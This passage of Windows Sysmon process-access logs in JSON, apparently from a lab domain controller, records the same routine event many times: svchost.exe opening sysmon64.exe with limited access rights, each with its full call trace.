C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2835,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2836,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2837,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2838,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2839,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2840,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2841,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2842,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 